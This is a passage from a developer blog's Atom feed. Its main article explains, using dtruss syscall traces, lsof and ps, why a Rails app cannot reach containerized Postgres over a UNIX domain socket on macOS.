class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.897438em;vertical-align:-0.08333em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;7&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;8&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;≈&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, or generalised further into Pythagoras&#39; famous &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;msup&gt;&lt;mi&gt;a&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;msup&gt;&lt;mi&gt;b&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mi&gt;c&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;a^2 + b^2 = c^2&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.897438em;vertical-align:-0.08333em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;a&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;b&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;c&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, which blows my mind. Triangles are everywhere! &lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fnref3&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/section&gt;
</content>
  </entry>
  <entry>
    <title>Why Can&#39;t Rails Use UNIX Sockets With Containerized Postgres?</title>
    <link href="https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/"/>
    <updated>2023-07-15T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/</id>
    <content xml:lang="en" type="html">&lt;p&gt;I wasn&#39;t paying attention while setting up a work &lt;a href=&quot;https://rubyonrails.org/&quot;&gt;Rails&lt;/a&gt; project recently (my level of Rails proficiency is firmly &lt;em&gt;winging it&lt;/em&gt;) and I bumped into this:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# bundle manages ruby dependencies, rake is a ruby build tool&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# this command is saying: hey, please run the task that sets up my database&lt;/span&gt;&lt;br /&gt;$ bundle &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; rake db:setup&lt;br /&gt;connection to server on socket &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/.s.PGSQL.5432&quot;&lt;/span&gt; failed: No such &lt;span class=&quot;token function&quot;&gt;file&lt;/span&gt; or directory&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I spend a good amount of time blowing up databases, sometimes on purpose but mostly by accident, so for my development workflow I tend to run instances of Postgres in containers.&lt;/p&gt;
&lt;p&gt;Most projects run just fine: they dial &lt;code&gt;localhost&lt;/code&gt; on port &lt;code&gt;5432&lt;/code&gt; and the good times roll. In this instance, however, I was ignoring &lt;em&gt;this&lt;/em&gt; project&#39;s &lt;code&gt;README.md&lt;/code&gt;, which advocated a local install of the wonderful &lt;a href=&quot;https://postgresapp.com/&quot;&gt;Postgres.app&lt;/a&gt;. Postgres runs as a server, which can be a little fussy in terms of setup, and Postgres.app simplifies the whole process into a standard macOS application.&lt;/p&gt;
&lt;p&gt;Still: what was going on here? &lt;em&gt;socket&lt;/em&gt;? &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt;? No such &lt;code&gt;file&lt;/code&gt;? What is this word soup? Aren&#39;t we supposed to be connecting to a database? I had a perfectly good Postgres container primed and waiting on port &lt;code&gt;5432&lt;/code&gt;! No, I have not read the project&#39;s README!&lt;/p&gt;
&lt;p&gt;Let&#39;s unwind a little. Rails conventionally stores settings relating to the database in &lt;code&gt;config/database.yml&lt;/code&gt;, so that was a natural first destination. The section for &lt;code&gt;host&lt;/code&gt; was commented out, and featured this context: &lt;code&gt;Connect on a TCP socket. Omitted by default since the client uses a domain socket that doesn&#39;t need configuration.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The most straightforward thing to do for my workflow would be to uncomment that host line out and set it to connect over TCP to &lt;code&gt;localhost:5432&lt;/code&gt;. That&#39;s actually the &lt;em&gt;only&lt;/em&gt; thing you can really do in this situation (read: when using macOS, and without some arcane trickery) but if you&#39;re anything like me you&#39;re ready to take an excruciatingly long (and fun, I hope!) journey to figure out &lt;em&gt;why&lt;/em&gt; that is.&lt;/p&gt;
&lt;h2 id=&quot;socket-to-me&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#socket-to-me&quot;&gt;Socket to Me&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;So, cool, let&#39;s dig deeper: we have a &lt;code&gt;rake&lt;/code&gt; task that wants to setup a Rails application, and it needs to speak to something external to itself - in this instance, a database - in order to go about its business. If you want to sound smart, you&#39;ll of course call this something like &lt;a href=&quot;https://en.wikipedia.org/wiki/Inter-process_communication&quot;&gt;interprocess communication&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Perhaps the most famous method of interprocess communication is the socket. A socket, in this context, is usually going to refer to sending data through the network, out into the magical world of the internet, and back again.&lt;/p&gt;
&lt;p&gt;This is most commonly done using two nifty protocols: TCP and IP. That&#39;s what I was assuming our &lt;code&gt;rake&lt;/code&gt; command would be using to reach out to Postgres - that&#39;s what we&#39;d get if we connected to &lt;code&gt;localhost:5432&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;One super interesting detail of all this is that our applications aren&#39;t actually &lt;em&gt;allowed&lt;/em&gt; to talk over a socket without getting permission: sitting &lt;em&gt;between&lt;/em&gt; our socket and Ruby (or Python, JavaScript or &lt;em&gt;any programming language&lt;/em&gt;) is going to be the operating system. And it&#39;s the operating system that does a lot of the heavy lifting.&lt;/p&gt;
&lt;p&gt;macOS is a POSIX-compatible operating system, with POSIX being a &lt;a href=&quot;https://pubs.opengroup.org/onlinepubs/9699919799/&quot;&gt;set of standards&lt;/a&gt; for compatibility between operating systems. Linux is generally another one. POSIX operating systems use the Berkeley Sockets API for a standardised method of managing network connections.&lt;/p&gt;
&lt;p&gt;So, we have to ask the OS:&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/socket-syscall.svg&quot; alt=&quot;Application code can&#39;t make sockets by itself, it needs to make a system call to the operating system&quot; /&gt;
&lt;p&gt;So here we have us, the user, executing code written in Ruby, which provides its own abstraction of the underlying Berkeley Sockets API. The most common Ruby interpreter is written in C - you&#39;ll almost certainly know if you&#39;re &lt;em&gt;not&lt;/em&gt; using it - and its &lt;a href=&quot;https://ruby-doc.org/3.2.2/exts/socket/Socket.html&quot;&gt;Socket class&lt;/a&gt; itself calls out, via POSIX C libraries, to the operating system kernel (interacting with sockets is just a few of the many possible system calls). Finally, the operating system establishes and maintains the socket connection. So, and I find this wonderful, our little unassuming chain of events ripples all the way through into the protected core of the operating system.&lt;/p&gt;
&lt;p&gt;On macOS, we can use a program called &lt;code&gt;dtruss&lt;/code&gt; (warning: setting up &lt;code&gt;dtruss&lt;/code&gt; to work is bit of a faff) to take a peek and see what system calls our applications are making. Here&#39;s it running for our &lt;code&gt;bundle exec rake db:setup&lt;/code&gt; task.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;	PID/THRD  SYSCALL&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;args&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; 		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;return&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  socket&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0x1, 0x1, 0x0&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  fcntl&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x3, 0x2&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  fcntl&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x4, 0x6&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  fcntl&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x2, 0x1&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  setsockopt&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0xFFFF, 0x1022&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  connect&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x7F9B69ACE950, 0x6A&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-1&lt;/span&gt; Err&lt;span class=&quot;token comment&quot;&gt;#2&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  close&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Let&#39;s dive in and explore a couple of these calls: &lt;code&gt;socket&lt;/code&gt; and &lt;code&gt;connect&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;socket&lt;/code&gt; is defined with the signature of &lt;code&gt;int socket(int domain, int type, int protocol)&lt;/code&gt;; you can probably look it up yourself on your machine with &lt;code&gt;man 2 socket&lt;/code&gt;. We&#39;re calling it with a &lt;code&gt;domain&lt;/code&gt; argument of &lt;code&gt;1&lt;/code&gt;, a &lt;code&gt;type&lt;/code&gt; argument of &lt;code&gt;1&lt;/code&gt; and a protocol of &lt;code&gt;0&lt;/code&gt; (the &lt;code&gt;dtruss&lt;/code&gt; output shows our numbers in hexadecimal format).&lt;/p&gt;
&lt;p&gt;We can map those &lt;code&gt;int&lt;/code&gt; values to constants in &lt;code&gt;sys/socket.h&lt;/code&gt; (on my machine that file is located at &lt;code&gt;/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/sys/socket.h&lt;/code&gt;, but your mileage may vary) and see that the first two values correspond to &lt;code&gt;AF_UNIX&lt;/code&gt; and &lt;code&gt;SOCK_STREAM&lt;/code&gt;. The last value is set to &lt;code&gt;0&lt;/code&gt;, which we can lookup in &lt;code&gt;/etc/protocols&lt;/code&gt; and see that it represents a generic catch-all internet result.&lt;/p&gt;
&lt;p&gt;The return value from &lt;code&gt;socket&lt;/code&gt; is shown as &lt;code&gt;10 0&lt;/code&gt; - we&#39;re actually tracking &lt;em&gt;two&lt;/em&gt; values, which feels a little cool and unfamiliar. The first is the return value from the syscall: &lt;code&gt;10&lt;/code&gt;. This is a reference to the file descriptor of the new socket, which we&#39;ll get to in a minute. The second return value is &lt;code&gt;0&lt;/code&gt;, which represents the global &lt;code&gt;errno&lt;/code&gt; variable used by the kernel to add more context to system call failures. &lt;code&gt;0&lt;/code&gt; means all good, which is great.&lt;/p&gt;
&lt;p&gt;So we&#39;ve now confirmed our expectation that the macOS kernel creates and manages a socket for our Ruby application. We can also see that we asked the operating system for a UNIX socket (&lt;code&gt;AF_UNIX&lt;/code&gt;). These are also known as domain sockets, which is what &lt;code&gt;database.yml&lt;/code&gt; mentioned. We said that sockets &lt;em&gt;usually&lt;/em&gt; travel over the internet, but these UNIX sockets are slightly different: they send messages between processes directly via the operating system kernel itself. These bytes aren&#39;t even making it to our networking hardware.&lt;/p&gt;
&lt;p&gt;Compare that to TCP/IP over &lt;code&gt;AF_INET&lt;/code&gt;:&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/tcp-and-unix-sockets.svg&quot; alt=&quot;A side-by-side look at TCP/IP and UNIX socket stacks.&quot; /&gt;
&lt;p&gt;Regardless of their type, sockets lie dormant after being created, waiting for a &lt;code&gt;connect&lt;/code&gt; call. The first argument we send to &lt;code&gt;connect&lt;/code&gt; is an integer &lt;code&gt;10&lt;/code&gt;, which is the reference to the file descriptor - apologies, I know, I said we&#39;d get to those and we haven&#39;t yet - of the socket we got earlier. The next argument is the memory address, &lt;code&gt;0x7F9B69ACE950&lt;/code&gt;, which points to a &lt;code&gt;struct&lt;/code&gt; (of type &lt;code&gt;sockaddr_un&lt;/code&gt;) with a member field (&lt;code&gt;sun_family&lt;/code&gt;) containing the path to the &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; file. If we were initializing that &lt;code&gt;struct&lt;/code&gt; directly in C, it might look like this:&lt;/p&gt;
&lt;pre class=&quot;language-c&quot;&gt;&lt;code class=&quot;language-c&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;sockaddr_un&lt;/span&gt; my_cool_socket &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sun_family &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; AF_UNIX&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sun_path &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/.s.PGSQL.5432&quot;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The final argument to &lt;code&gt;connect&lt;/code&gt; is the length, in bytes, of the aforementioned structure. Our file &lt;em&gt;does not&lt;/em&gt; exist, so the &lt;code&gt;connect&lt;/code&gt; call returns a &lt;code&gt;-1&lt;/code&gt; (the universal sign of failure) and it sets that global &lt;code&gt;errno&lt;/code&gt; variable used by the kernel to &lt;code&gt;2&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What does &lt;code&gt;2&lt;/code&gt; mean here? We can take a peep on macOS with &lt;code&gt;man errno&lt;/code&gt;, which gives us this: &lt;code&gt;2 ENOENT No such file or directory.  A component of a specified pathname did not exist, or the pathname was an empty string.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Sounds about right! Our program is trying to connect to the UNIX socket file as a client, and the lack of that file&#39;s existence means that there&#39;s no corresponding server to chat to; the Postgres we have running in a container is only exposing TCP/IP to our macOS system.&lt;/p&gt;
&lt;h2 id=&quot;file-under-something&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#file-under-something&quot;&gt;File Under Something&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;It is a common refrain to say that &lt;a href=&quot;https://en.wikipedia.org/wiki/Everything_is_a_file&quot;&gt;almost everything in UNIX is a file&lt;/a&gt;. The sockets we create with the &lt;code&gt;socket&lt;/code&gt; syscall are files, our desired &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; UNIX domain socket path is a file and, you know, files we normally associate with being files are also files. The UNIX file is itself this kind of wonderful abstraction that allows us to (mostly) avoid the ins-and-outs of, say, how these files are actually stored as bytes.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;lsof&lt;/code&gt; conjures up a beautiful list of all open files on the system. It&#39;s huge:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# wc -l counts the number of lines&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;lsof&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;wc&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-l&lt;/span&gt;&lt;br /&gt;   &lt;span class=&quot;token number&quot;&gt;15413&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In its default state, &lt;code&gt;lsof&lt;/code&gt; looks at every file being used by every process. Processes are a pretty powerful abstraction used by the operating system to make computers work, and at a high-level each process on the system &lt;a href=&quot;https://pages.cs.wisc.edu/~remzi/OSTEP/&quot;&gt;represents a running program&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As part of running each process, the operating system kernel keeps track of the files allocated to it. Each and every process starts with three file descriptors - &lt;code&gt;0&lt;/code&gt;, &lt;code&gt;1&lt;/code&gt; and &lt;code&gt;2&lt;/code&gt; - which represent &lt;code&gt;stdin&lt;/code&gt;, &lt;code&gt;stdout&lt;/code&gt; and &lt;code&gt;stderr&lt;/code&gt;. Right off the bat, this shows us that &lt;em&gt;files&lt;/em&gt; don&#39;t have to correspond with our traditional mental model of a file.&lt;/p&gt;
&lt;p&gt;File descriptors are like a ticket for the process to use; the operating system sits between the process and the files, and read and write commands have to go through it (via some more operating system calls). Processes go up to the operating system and ask to, say, read &lt;code&gt;x&lt;/code&gt; number of bytes from the file represented by file descriptor &lt;code&gt;y&lt;/code&gt;. The operating system then goes off, runs a series of checks, and then &lt;em&gt;may&lt;/em&gt; return the result of that request if everything is tickety-boo.&lt;/p&gt;
&lt;p&gt;Each process also gets its own process id (commonly called a pid) and we can look all those up with the &lt;code&gt;ps&lt;/code&gt; command:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# -A displays processes belonging to all users, including those that aren&#39;t being used from the current terminal&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;ps&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;wc&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-l&lt;/span&gt;&lt;br /&gt;     &lt;span class=&quot;token number&quot;&gt;507&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At this point, I&#39;ve installed and started the aforementioned Postgres.app so we have a working reference point for what we &lt;em&gt;should&lt;/em&gt; be seeing. With a Postgres server up and running locally, we can run &lt;code&gt;ps&lt;/code&gt; and then we can &lt;code&gt;grep&lt;/code&gt; through that:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;ps&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;grep&lt;/span&gt; postgres&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7847&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:54.81 /Applications/Postgres.app/Contents/Versions/14/bin/postgres &lt;span class=&quot;token parameter variable&quot;&gt;-D&lt;/span&gt; /Users/martin/Library/Application Support/Postgres/var-14 &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7849&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:00.38 postgres: checkpointer&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7850&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:06.02 postgres: background writer&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7851&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:05.06 postgres: walwriter&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7852&lt;/span&gt; ??         &lt;span class=&quot;token 